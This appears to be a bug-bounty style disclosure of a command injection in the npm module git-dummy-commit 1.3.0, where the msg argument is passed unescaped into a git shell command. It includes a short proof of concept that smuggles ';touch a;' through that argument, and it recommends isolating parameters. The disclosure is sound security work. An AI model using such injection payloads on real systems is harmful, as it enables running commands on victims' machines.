Hi there, I’ve found a Command Injection on the “git-dummy-commit” module.
module name: git-dummy-commit
version: 1.3.0
npm page: https://www.npmjs.com/package/git-dummy-commit
> Create a dummy commit for testing
62 downloads in the last day
94 downloads in the last week
384 downloads in the last month
6078 downloads in the last year
The module appends the msg parameter to a command on line 37 without escaping it, leading to a command injection.
Proof of concept:

$ npm install git-dummy-commit

Create index.js with the following content, passing the payload ";touch a;" on line 3:

const gitDummyCommit = require('git-dummy-commit');
gitDummyCommit('";touch a;"');

$ node index.js
a
$ ls
a index.js
It is advisable to use a module that explicitly isolates the parameters to the git command.
( contacted the maintainer || opened issue ) = False
An attacker who controls the msg parameter can inject commands on the victim's machine.